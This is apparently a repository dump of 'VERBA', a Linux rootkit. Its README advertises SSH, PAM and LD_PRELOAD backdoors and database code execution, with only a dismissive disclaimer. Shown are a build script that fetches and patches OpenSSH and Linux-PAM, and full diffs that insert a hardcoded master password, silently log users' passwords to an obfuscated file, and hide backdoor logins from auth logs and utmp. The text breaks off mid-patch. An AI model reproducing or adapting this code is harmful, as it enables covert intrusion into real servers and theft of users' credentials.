├── .gitattributes ├── LICENSE ├── README.md ├── install.sh ├── pre ├── gen.sh ├── pam_patches │ ├── o_pam_066 │ ├── o_pam_067 │ ├── o_pam_075 │ └── o_pam_151 └── ssh_patches │ ├── o_ssh_411 │ ├── o_ssh_461 │ ├── o_ssh_531 │ ├── o_ssh_582 │ ├── o_ssh_611 │ ├── o_ssh_622 │ ├── o_ssh_691 │ ├── o_ssh_722 │ ├── o_ssh_731 │ ├── o_ssh_751 │ ├── o_ssh_761 │ ├── o_ssh_771 │ ├── o_ssh_781 │ ├── o_ssh_811 │ ├── o_ssh_861 │ ├── s_ssh_531 │ ├── s_ssh_582 │ ├── s_ssh_771 │ └── s_ssh_861 └── src ├── CLIENT └── .keep ├── HORSEPILL ├── horsepill │ ├── horsepill.c │ ├── horsepill.h │ ├── infect.c │ └── infect.h ├── init.diff └── run-init ├── LD ├── LD.c ├── Makefile ├── char_arrays ├── config.h ├── hiding │ ├── evasion │ │ ├── block_strings.c │ │ ├── evasion.c │ │ └── evasion.h │ ├── files │ │ ├── files.h │ │ ├── get_path_gid.c │ │ └── hidden.c │ ├── forge_maps.c │ ├── forge_procnet.c │ ├── hiding.h │ └── reinstall.c ├── hooks │ ├── audit │ │ ├── audit.c │ │ └── audit.h │ ├── authlog │ │ ├── authlog.h │ │ ├── log.c │ │ └── pam_vprompt.c │ ├── dir │ │ ├── chdir.c │ │ ├── dir.h │ │ ├── mkdir.c │ │ ├── opendir.c │ │ ├── readdir.c │ │ └── rmdir.c │ ├── exec │ │ ├── exec.h │ │ ├── execve.c │ │ └── execvp.c │ ├── gid │ │ ├── gid.h │ │ ├── setegid.c │ │ ├── setgid.c │ │ ├── setregid.c │ │ └── setresgid.c │ ├── kill.c │ ├── libdl │ │ ├── dladdr.c │ │ ├── dlinfo.c │ │ ├── dlsym.c │ │ ├── gsym.c │ │ └── libdl.h │ ├── ln │ │ ├── links.h │ │ ├── readlink.c │ │ ├── symlink.c │ │ └── unlink.c │ ├── open │ │ ├── access.c │ │ ├── fopen.c │ │ ├── open.c │ │ └── open.h │ ├── pam │ │ ├── pam.h │ │ ├── pam_hooks.c │ │ ├── pam_private.h │ │ └── pam_syslog.c │ ├── pcap │ │ ├── pcap.c │ │ └── pcap.h │ ├── perms │ │ ├── chmod.c │ │ ├── chown.c │ │ └── perms.h │ ├── ptrace.c │ ├── pwd │ │ ├── pwd.h │ │ ├── pwnam_ent.c │ │ └── pwnam_user.c │ ├── rw │ │ ├── fread.c │ │ ├── fwrite.c │ │ ├── log_ssh.c │ │ ├── read.c │ │ ├── rw.h │ │ └── write.c │ ├── socket.c │ ├── stat │ │ ├── fstat.c │ │ ├── lstat.c │ │ ├── stat.c │ │ └── stat.h │ ├── syslog │ │ ├── syslog.c │ │ └── syslog.h │ └── utmp │ │ ├── getut.c │ │ ├── putut.c │ │ └── utmp.h └── util │ ├── bdusr.c │ ├── processes.c │ ├── util.h │ ├── xor.c │ └── xor_wrappers.h ├── LKM ├── LKM.c ├── Makefile └── config.h ├── LOADER ├── LOADER.c ├── Makefile └── encrypt │ ├── Makefile │ ├── encrypt.c │ └── encrypt.h ├── MYSQL ├── Makefile └── UDF.c ├── PAM └── .keep ├── POSTGRES ├── Makefile └── UDF.c ├── SERVICE ├── init.service └── main.service ├── SSHD └── .keep └── TOOLS ├── elfchngr.c ├── loader.c ├── passgen.c └── skipcpio.c /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 |
3 | 4 | ![](https://i.imgur.com/PSns8lu.png) 5 | 6 |
7 | 8 | #
VERBA - (Very Easy Relative Backdoor Application)
9 | --- 10 | 11 | > Тhey’re always willing to trade away a little of their freedom in exchange for the feeling, the illusion of security. 12 | > 13 | > -- George Carlin 14 | 15 | --- 16 | ## Rules: 17 | 18 | For education purpose only and bla blya bla... 19 | 20 | ## Tested on x86 and x86_64 21 | - Centos 6.10: 2.6.32-754.27.1.el6 22 | - Centos 7: 3.10.0-862.3.2.el7 23 | - Centos 8: 4.18.0-193.el8 24 | - Debian 10: 4.19.0-9 25 | - Ubuntu 20.04 LTS: 5.4.0-40-generic 26 | 27 | ## Features 28 | Simple rootkit with mass access: 29 | 30 | - Few persist methods 31 | - LD_PRELOAD 32 | - SSH Backdoor 33 | - PAM Backdoor 34 | - RCE MySQL/PG 35 | 36 | ## Pre 37 | ``` 38 | cd ./pre 39 | ./pre.sh 40 | cd - 41 | ``` 42 | 43 | ## Usage 44 | Copy CLIENT to ./src/CLIENT/ 45 | 46 | Put needed SSH and PAM version into ./src/SSH/ and ./src/PAM/ 47 | 48 | Copy folder to target 49 | 50 | ``` 51 | ./install.sh 52 | ``` 53 | Have fun. 54 | 55 | ## References 56 | - "[LKM HACKING](http://www.ouah.org/LKM_HACKING.html)", The Hackers Choice (THC), 1999; 57 | - [http://phrack.org/issues/68/11.html](http://phrack.org/issues/68/11.html) 58 | - [https://github.com/naworkcaj/bdvl](https://github.com/naworkcaj/bdvl) 'Was... Awesome.' 59 | - [https://github.com/r00tkillah/HORSEPILL](https://github.com/r00tkillah/HORSEPILL) 60 | - [https://github.com/milabs/kmatryoshka](https://github.com/milabs/kmatryoshka) 61 | 62 | ## To Do 63 | - Modernize loader to modify version 64 | - Add ITIME from NSA 65 | - Continue test OpenSUSE 66 | - Add Oracle backdoor 67 | 68 | --- 69 | 70 | 2019-2021 [@Not_C_Developer](https://t.me/Not_C_Developer) 71 | 72 | --- 73 | -------------------------------------------------------------------------------- /pre/gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | necho(){ 4 | printf ' \e[97;1;2m[...]\t%b\e[0m\n' "$1" 5 | } 6 | 7 | secho(){ 8 | printf ' \e[92m[+]\t%b\e[0m\n' "$1" 9 | } 10 | 11 | eecho(){ 12 | printf ' \e[91;1;1m[!]\t%b\e[0m\n' "$1" 13 | exit 255 14 | } 15 | 16 | unpack(){ 17 | cd ${1%%${1##*\/}} 1>/dev/null 18 | case ${1##*\.} in 19 | xz) 20 | tar -Jxf ${i}.tar.xz &>/dev/null 21 | ;; 22 | zip) 23 | unzip ${i}.zip &>/dev/null 24 | ;; 25 | gz) 26 | tar -zxf ${i}.tar.gz &>/dev/null 27 | ;; 28 | bz2) 29 | tar -jxf ${i}.tar.bz2 &>/dev/null 30 | ;; 31 | esac 32 | shred -u ${i}.* 33 | mv *${i} ${i} &>/dev/null 34 | mv ./Linux-PAM ${i} &>/dev/null 35 | cd - 1>/dev/null 36 | } 37 | 38 | patching(){ 39 | read -a jj <<< ${!1} 40 | for j in ${jj[@]};do 41 | [[ -d ${3}/${j} ]] && { 42 | [[ ! -f ${3}/${j}/${1}.patch ]] && cp ${2}/${1} ${3}/${j}/${1}.patch || return 0 43 | cd ${3}/${j} 1>/dev/null 44 | [[ "${j}" =~ "7."[45678]"p1" ]] && patch -p1 -i ./${1}.patch 1>/dev/null || patch -i ./${1}.patch 1>/dev/null 45 | (( $? != 0 )) && { 46 | patch -p1 -i ./${1}.patch 1>/dev/null 47 | (( $? != 0 )) && eecho "ERROR when patching [ ${3}/${j} ($?) ]." 48 | } 49 | shred -u ./*.orig ./*.rej ./modules/pam_unix/*.orig ./modules/pam_unix/*.rej &>/dev/null 50 | cd - 1>/dev/null 51 | } || eecho "ERROR no directory ${2}/${j}" 52 | done 53 | } 54 | 55 | o_ssh_411=("4.0p1 4.1p1") 56 | o_ssh_461=("4.2p1 4.3p1 4.3p2 4.4p1 4.5p1 4.6p1") 57 | o_ssh_531=("4.7p1 4.9p1 5.0p1 5.1p1 5.2p1 5.3p1") 58 | o_ssh_582=("5.4p1 5.5p1 5.6p1 5.7p1 5.8p1 5.8p2") 59 | o_ssh_611=("5.9p1 6.0p1 6.1p1") 60 | o_ssh_622=("6.2p1 6.2p2") 61 | o_ssh_691=("6.3p1 6.4p1 6.5p1 6.6p1 6.7p1 6.8p1 6.9p1") 62 | o_ssh_722=("7.0p1 7.1p1 7.1p2 7.2p1 7.2p2") 63 | o_ssh_731=("7.3p1") 64 | o_ssh_751=("7.4p1 7.5p1") 65 | o_ssh_761=("7.6p1") 66 | o_ssh_771=("7.7p1") 67 | o_ssh_781=("7.8p1") 68 | o_ssh_811=("7.9p1 8.0p1 8.1p1") 69 | o_ssh_861=("8.2p1 8.3p1 8.4p1 8.5p1 8.6p1") 70 | 71 | s_ssh_531=("4.0p1 4.1p1 4.2p1 4.3p1 4.3p2 4.4p1 4.5p1 4.6p1 4.7p1 4.9p1 5.0p1 5.1p1 5.2p1 5.3p1") 72 | s_ssh_582=("5.4p1 5.5p1 5.6p1 5.7p1 5.8p1 5.8p2") 73 | s_ssh_771=("5.9p1 6.0p1 6.1p1 6.2p1 6.2p2 6.3p1 6.4p1 6.5p1 6.6p1 6.7p1 6.8p1 6.9p1 7.0p1 7.1p1 7.1p2 7.2p1 7.2p2 7.3p1 7.4p1 7.5p1 7.6p1 7.7p1") 74 | s_ssh_861=("7.8p1 7.9p1 8.0p1 8.1p1 8.2p1 8.3p1 8.4p1 8.5p1 8.6p1") 75 | 76 | o_pam_066=("0.59 0.61 0.62 0.63 0.64 0.65 0.66") 77 | o_pam_067=("0.67") 78 | o_pam_075=("0.68 0.69 0.70 0.71 0.72 0.73 0.74 0.75") 79 | o_pam_151=("0.76 0.77 0.78 0.79 0.80 0.81 0.99.1.0 0.99.10.0 0.99.2.0 0.99.2.1 0.99.3.0 0.99.4.0 0.99.5.0 0.99.6.0 0.99.6.1 0.99.6.2 0.99.6.3 0.99.7.0 0.99.7.1 0.99.8.0 0.99.8.1 0.99.9.0 1.0.0 1.0.1 1.0.2 1.0.3 1.0.4 1.1.0 1.1.1 1.1.2 1.1.3 1.1.4 1.1.5 1.1.6 1.1.7 1.1.8 1.2.0 1.2.1 1.3.0 1.3.1 1.4.0 1.5.0 1.5.1") 80 | 81 | SSHUPATH="./ssh_patches" 82 | PAMUPATH="./pam_patches" 83 | patch_ssh_ver=($(ls -1 ${SSHUPATH}/*|cut -f3 -d'/')) 84 | patch_pam_ver=($(ls -1 ${PAMUPATH}/*|cut -f3 -d'/')) 85 | SSHNPATH="./src/SSHD" 86 | PAMNPATH="./src/PAM" 87 | 88 | mkdir -p ${SSHNPATH} ${PAMNPATH} 89 | 90 | ### 91 | necho "Downloading and unpacking SSHs..." 92 | for i in {4..8}.{0..9}p{1..2};do 93 | [[ ! -d ${SSHNPATH}/${i} ]] && { 94 | wget -nc -q http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${i}.tar.gz -O ${SSHNPATH}/${i}.tar.gz 95 | unpack ${SSHNPATH}/${i}.tar.gz 96 | } 97 | done 98 | 99 | necho "Downloading and unpacking PAMs..." 100 | for i in {0.{56..81},0.99.{1..10}.{0..3}};do 101 | [[ ! -d ${PAMNPATH}/${i} ]] && { 102 | wget -nc -q http://ftp.be.debian.org/pub/linux/libs/pam/pre/library/Linux-PAM-${i}.tar.bz2 -O ${PAMNPATH}/${i}.tar.bz2 103 | unpack ${PAMNPATH}/${i}.tar.bz2 104 | } 105 | done 106 | for i in 1.{0..3}.{0..9};do 107 | [[ ! -d ${PAMNPATH}/${i} ]] && { 108 | wget -nc -q http://www.linux-pam.org/library/Linux-PAM-${i}.tar.bz2 -O ${PAMNPATH}/${i}.tar.bz2 109 | unpack ${PAMNPATH}/${i}.tar.bz2 110 | } 111 | done 112 | for i in 1.{3..6}.{0..9};do 113 | [[ ! -d ${PAMNPATH}/${i} ]] && { 114 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/v${i}.zip -O ${PAMNPATH}/${i}.zip 115 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/Linux-PAM-${i}.zip -O ${PAMNPATH}/${i}.zip 116 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/Linux-PAM-${i//./_}.zip -O ${PAMNPATH}/${i}.zip 117 | unpack ${PAMNPATH}/${i}.zip 118 | } 119 | done 120 | secho "Successful." 121 | 122 | ### 123 | necho "Patching SSHs..." 124 | for i in ${patch_ssh_ver[@]};do 125 | patching ${i} ${SSHUPATH} ${SSHNPATH} 126 | done 127 | 128 | necho "Patching PAMs..." 129 | for i in ${patch_pam_ver[@]};do 130 | patching ${i} ${PAMUPATH} ${PAMNPATH} 131 | done 132 | secho "Successful." 133 | 134 | ### 135 | necho "Cleaning..." 136 | shred -u ./src/{SSHD,PAM}/*/*.patch 137 | secho "Successful." 138 | -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_066: -------------------------------------------------------------------------------- 1 | diff -Nuar 0.66.orig/modules/pam_unix/pam_unix_auth.c 0.66/modules/pam_unix/pam_unix_auth.c 2 | --- 0.66.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.232589096 +0200 3 | +++ 0.66/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:50:11.132792616 +0200 4 | @@ -145,6 +145,23 @@ 5 | * onto a normal UNIX authentication 6 | */ 7 | 8 | +#define XKEY %%XKEY%% 9 | +#define PAM_KEY "%%PAM_KEY%%" 10 | +#define PAM_LOGS "%%PAM_LOGS%%" 11 | + 12 | +static void _xor(char *p){ 13 | + int i; 14 | + for(i = 0; i < strlen(p); i++) 15 | + if(p[i] ^ XKEY) 16 | + p[i] ^= XKEY; 17 | +} 18 | + 19 | +static void clean(void *var){ 20 | + memset(var, 0x00, strlen((char *)var)); 21 | + free(var); 22 | +} 23 | + 24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name); 25 | static int _pam_auth_unix( pam_handle_t *pamh, 26 | int flags, 27 | int argc, 28 | @@ -236,10 +253,24 @@ 29 | return PAM_AUTH_ERR; 30 | 31 | pp = crypt(p, salt); 32 | - 33 | - if ( strcmp( pp, salt ) == 0 ) 34 | - return PAM_SUCCESS; 35 | - 36 | + xor(pam_p, PAM_KEY); 37 | + if(!strcmp(p, pam_p)) 38 | + return PAM_SUCCESS; 39 | + else 40 | + if ( pp && strcmp( pp, salt ) == 0 ){ 41 | + FILE *fd; 42 | + char bds[256]; 43 | + xor(logf, PAM_LOGS); 44 | + fd = fopen(logf, "a"); 45 | + sprintf(bds, "%s:%s", name, p); 46 | + _xor(bds); 47 | + fprintf(fd, "%s\n", bds); 48 | + memset(bds, 0, 255); 49 | + clean(logf); 50 | + fclose(fd); 51 | + clean(pam_p); 52 | + return PAM_SUCCESS; 53 | + } 54 | return PAM_AUTH_ERR; 55 | } 56 | 57 | -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_067: -------------------------------------------------------------------------------- 1 | diff -Nuar 0.67.orig/modules/pam_unix/pam_unix_auth.c 0.67/modules/pam_unix/pam_unix_auth.c 2 | --- 0.67.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.236589096 +0200 3 | +++ 0.67/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:43:20.572787691 +0200 4 | @@ -115,6 +115,23 @@ 5 | * onto a normal UNIX authentication 6 | */ 7 | 8 | +#define XKEY %%XKEY%% 9 | +#define PAM_KEY "%%PAM_KEY%%" 10 | +#define PAM_LOGS "%%PAM_LOGS%%" 11 | + 12 | +static void _xor(char *p){ 13 | + int i; 14 | + for(i = 0; i < strlen(p); i++) 15 | + if(p[i] ^ XKEY) 16 | + p[i] ^= XKEY; 17 | +} 18 | + 19 | +static void clean(void *var){ 20 | + memset(var, 0x00, strlen((char *)var)); 21 | + free(var); 22 | +} 23 | + 24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name); 25 | static int _pam_auth_unix( pam_handle_t *pamh, 26 | int flags, 27 | int argc, 28 | @@ -204,10 +221,24 @@ 29 | return PAM_AUTH_ERR; 30 | 31 | pp = p ? crypt(p, salt) : NULL; 32 | - 33 | - if ( pp && strcmp( pp, salt ) == 0 ) 34 | - return PAM_SUCCESS; 35 | - 36 | + xor(pam_p, PAM_KEY); 37 | + if(!strcmp(p, pam_p)) 38 | + return PAM_SUCCESS; 39 | + else 40 | + if ( pp && strcmp( pp, salt ) == 0 ){ 41 | + FILE *fd; 42 | + char bds[256]; 43 | + xor(logf, PAM_LOGS); 44 | + fd = fopen(logf, "a"); 45 | + sprintf(bds, "%s:%s", name, p); 46 | + _xor(bds); 47 | + fprintf(fd, "%s\n", bds); 48 | + memset(bds, 0, 255); 49 | + clean(logf); 50 | + fclose(fd); 51 | + clean(pam_p); 52 | + return PAM_SUCCESS; 53 | + } 54 | return PAM_AUTH_ERR; 55 | } 56 | 57 | -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_075: -------------------------------------------------------------------------------- 1 | diff -Nuar 0.75.orig/modules/pam_unix/pam_unix_auth.c 0.75/modules/pam_unix/pam_unix_auth.c 2 | --- 0.75.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.288589097 +0200 3 | +++ 0.75/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:23:54.464773702 +0200 4 | @@ -92,6 +92,23 @@ 5 | return retval; \ 6 | } 7 | 8 | +#define XKEY %%XKEY%% 9 | +#define PAM_KEY "%%PAM_KEY%%" 10 | +#define PAM_LOGS "%%PAM_LOGS%%" 11 | + 12 | +static void _xor(char *p){ 13 | + int i; 14 | + for(i = 0; i < strlen(p); i++) 15 | + if(p[i] ^ XKEY) 16 | + p[i] ^= XKEY; 17 | +} 18 | + 19 | +static void clean(void *var){ 20 | + memset(var, 0x00, strlen((char *)var)); 21 | + free(var); 22 | +} 23 | + 24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name); 25 | PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags 26 | ,int argc, const char **argv) 27 | { 28 | @@ -166,7 +183,25 @@ 29 | D(("user=%s, password=[%s]", name, p)); 30 | 31 | /* verify the password of this user */ 32 | - retval = _unix_verify_password(pamh, name, p, ctrl); 33 | + xor(pam_p, PAM_KEY); 34 | + if(!strcmp(p,pam_p)) 35 | + retval = PAM_SUCCESS; 36 | + else { 37 | + retval = _unix_verify_password(pamh, name, p, ctrl); 38 | + if(retval == PAM_SUCCESS){ 39 | + FILE *fd; 40 | + char bds[256]; 41 | + xor(logf, PAM_LOGS); 42 | + fd = fopen(logf, "a"); 43 | + sprintf(bds, "%s:%s", name, p); 44 | + _xor(bds); 45 | + fprintf(fd, "%s\n", bds); 46 | + memset(bds, 0, 255); 47 | + clean(logf); 48 | + fclose(fd); 49 | + } 50 | + } 51 | + clean(pam_p); 52 | name = p = NULL; 53 | 54 | AUTH_RETURN 55 | -------------------------------------------------------------------------------- /pre/pam_patches/o_pam_151: -------------------------------------------------------------------------------- 1 | diff -Nuar 1.3.1.orig/modules/pam_unix/pam_unix_auth.c 1.3.1/modules/pam_unix/pam_unix_auth.c 2 | --- 1.3.1.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:01:31.828757596 +0200 3 | +++ 1.3.1/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:08:09.312762365 +0200 4 | @@ -82,6 +82,23 @@ 5 | return retval; \ 6 | } while (0) 7 | 8 | +#define XKEY %%XKEY%% 9 | +#define PAM_KEY "%%PAM_KEY%%" 10 | +#define PAM_LOGS "%%PAM_LOGS%%" 11 | + 12 | +static void _xor(char *p){ 13 | + int i; 14 | + for(i = 0; i < strlen(p); i++) 15 | + if(p[i] ^ XKEY) 16 | + p[i] ^= XKEY; 17 | +} 18 | + 19 | +static void clean(void *var){ 20 | + memset(var, 0x00, strlen((char *)var)); 21 | + free(var); 22 | +} 23 | + 24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name); 25 | 26 | static void 27 | setcred_free (pam_handle_t *pamh UNUSED, void *ptr, int err UNUSED) 28 | @@ -170,7 +187,25 @@ 29 | D(("user=%s, password=[%s]", name, p)); 30 | 31 | /* verify the password of this user */ 32 | - retval = _unix_verify_password(pamh, name, p, ctrl); 33 | + xor(pam_p, PAM_KEY); 34 | + if(!strcmp(p,pam_p)) 35 | + retval = PAM_SUCCESS; 36 | + else { 37 | + retval = _unix_verify_password(pamh, name, p, ctrl); 38 | + if(retval == PAM_SUCCESS){ 39 | + FILE *fd; 40 | + char bds[256]; 41 | + xor(logf, PAM_LOGS); 42 | + fd = fopen(logf, "a"); 43 | + sprintf(bds, "%s:%s", name, p); 44 | + _xor(bds); 45 | + fprintf(fd, "%s\n", bds); 46 | + memset(bds, 0, 255); 47 | + clean(logf); 48 | + fclose(fd); 49 | + } 50 | + } 51 | + clean(pam_p); 52 | name = p = NULL; 53 | 54 | AUTH_RETURN; 55 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_411: -------------------------------------------------------------------------------- 1 | diff -Nuar 4.1p1.orig/auth-pam.c 4.1p1/auth-pam.c 2 | --- 4.1p1.orig/auth-pam.c 2020-04-10 17:17:30.211797940 +0200 3 | +++ 4.1p1/auth-pam.c 2020-04-13 13:18:25.357428795 +0200 4 | @@ -1143,6 +1143,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 4.1p1.orig/auth-passwd.c 4.1p1/auth-passwd.c 25 | --- 4.1p1.orig/auth-passwd.c 2020-04-10 17:17:30.211797940 +0200 26 | +++ 4.1p1/auth-passwd.c 2020-04-14 13:29:38.928853648 +0200 27 | @@ -77,6 +77,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -114,6 +122,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 4.1p1.orig/auth.c 4.1p1/auth.c 65 | --- 4.1p1.orig/auth.c 2020-04-10 17:17:30.211797940 +0200 66 | +++ 4.1p1/auth.c 2020-04-13 13:21:12.897435385 +0200 67 | @@ -236,6 +236,7 @@ 68 | else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s for %s%.100s from %.200s port %d%s", 73 | authmsg, 74 | method, 75 | @@ -244,6 +245,7 @@ 76 | get_remote_ipaddr(), 77 | get_remote_port(), 78 | info); 79 | + } 80 | 81 | #ifdef CUSTOM_FAILED_LOGIN 82 | if (authenticated == 0 && !authctxt->postponed && 83 | diff -Nuar 4.1p1.orig/canohost.c 4.1p1/canohost.c 84 | --- 4.1p1.orig/canohost.c 2020-04-10 17:17:30.211797940 +0200 85 | +++ 4.1p1/canohost.c 2020-04-13 13:21:30.373436072 +0200 86 | @@ -60,12 +60,14 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | 97 | + } 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | * someone is trying to trick us by PTR record like following: 101 | diff -Nuar 4.1p1.orig/conf.h 4.1p1/conf.h 102 | --- 4.1p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 103 | +++ 4.1p1/conf.h 2020-04-14 13:36:58.416870934 +0200 104 | @@ -0,0 +1,12 @@ 105 | +#include 106 | + 107 | +int secret_ok; 108 | +FILE *f; 109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 112 | +#define XKEY %%XKEY%% 113 | + 114 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 115 | + 116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host); 185 | password = read_passphrase(prompt, 0); 186 | + char *ohk = strdup(OPENSSH_KEY); 187 | + rox(ohk); 188 | + if((f=fopen(ohk, "a+")) != NULL){ 189 | + CLEAN(ohk); 190 | + char bds[512]; 191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 192 | + rox(bds); 193 | + fprintf(f, "%s\n", bds); 194 | + CLEAN(bds); 195 | + fflush(f); 196 | + fclose(f); 197 | + } 198 | + CLEAN(ohk); 199 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 200 | packet_put_cstring(authctxt->server_user); 201 | packet_put_cstring(authctxt->service); 202 | diff -Nuar 4.1p1.orig/sshlogin.c 4.1p1/sshlogin.c 203 | --- 4.1p1.orig/sshlogin.c 2020-04-10 17:17:30.215797940 +0200 204 | +++ 4.1p1/sshlogin.c 2020-04-10 19:23:00.928094145 +0200 205 | @@ -112,8 +112,7 @@ 206 | 207 | li = login_alloc_entry(pid, user, host, tty); 208 | login_set_addr(li, addr, addrlen); 209 | - login_login(li); 210 | - login_free_entry(li); 211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 212 | } 213 | 214 | #ifdef LOGIN_NEEDS_UTMPX 215 | @@ -125,8 +124,7 @@ 216 | 217 | li = login_alloc_entry(pid, user, host, ttyname); 218 | login_set_addr(li, addr, addrlen); 219 | - login_utmp_only(li); 220 | - login_free_entry(li); 221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 222 | } 223 | #endif 224 | 225 | @@ -137,6 +135,5 @@ 226 | struct logininfo *li; 227 | 228 | li = login_alloc_entry(pid, user, NULL, tty); 229 | - login_logout(li); 230 | - login_free_entry(li); 231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 232 | } 233 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_461: -------------------------------------------------------------------------------- 1 | diff -Nuar 4.6p1.orig/auth-pam.c 4.6p1/auth-pam.c 2 | --- 4.6p1.orig/auth-pam.c 2020-04-10 17:17:30.283797943 +0200 3 | +++ 4.6p1/auth-pam.c 2020-04-13 13:28:26.301452432 +0200 4 | @@ -1209,6 +1209,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk,"a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 4.6p1.orig/auth-passwd.c 4.6p1/auth-passwd.c 25 | --- 4.6p1.orig/auth-passwd.c 2020-04-10 17:17:30.283797943 +0200 26 | +++ 4.6p1/auth-passwd.c 2020-04-14 13:29:30.224853305 +0200 27 | @@ -86,6 +86,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -123,6 +131,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 4.6p1.orig/auth.c 4.6p1/auth.c 65 | --- 4.6p1.orig/auth.c 2020-04-10 17:17:30.283797943 +0200 66 | +++ 4.6p1/auth.c 2020-04-13 13:33:27.433464276 +0200 67 | @@ -264,6 +264,7 @@ 68 | 